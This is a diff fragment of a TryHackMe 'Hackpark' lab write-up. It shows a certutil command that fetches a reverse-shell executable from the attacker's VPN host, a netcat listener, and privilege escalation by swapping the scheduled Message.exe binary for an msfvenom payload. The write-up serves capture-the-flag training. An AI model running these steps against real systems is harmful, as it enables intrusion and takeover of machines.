M0rdial/THM-WriteUps/medium/Hackpark.md

               13 File(s)        642,150 bytes
                3 Dir(s)  38,979,338,240 bytes free
 ```
-- Using the netcat session we got from compromising the machine with exploit, we host python simple server than fetch the payload on the compromised machine with the command ``` certutil -urlcache -f http://<my vpn ip address>:8000/reverse_shell.exe reverse_shell.exe ```, than open another netcat listener for this reverse shell then execute is on the compromised machine, we will get a more stable reverse shell.
+- Using the netcat session we got from compromising the machine with exploit, I host python simple server than fetch the payload on the compromised machine with the command ``` certutil -urlcache -f http://<my vpn ip address>:8000/reverse_shell.exe reverse_shell.exe ```, than open another netcat listener for this reverse shell then execute is on the compromised machine, we will get a more stable reverse shell.

 - To escalate our privilege to Administrator we traverse to the ``` C:\Program Files (x86)\SystemScheduler\ ``` directory.
 Rename the ``` Message.exe ``` binary to something else, then on my  machine I create a payload with msfvenom with the same name of the binary on my machine.
-I upload the payload from my machine to the compromised machine the same way we upload the reverse shell payload, because the WindowsScheduler executes the ``` Message.exe ```, our malicious binary we'll be executed causing reverse shell with Administrator privileges.
+I upload the payload from my machine to the compromised machine the same way I upload the reverse shell payload, because the WindowsScheduler executes the ``` Message.exe ```, our malicious binary we'll be executed causing reverse shell with Administrator privileges.

 ```
 C:\Windows\Temp>systeminfo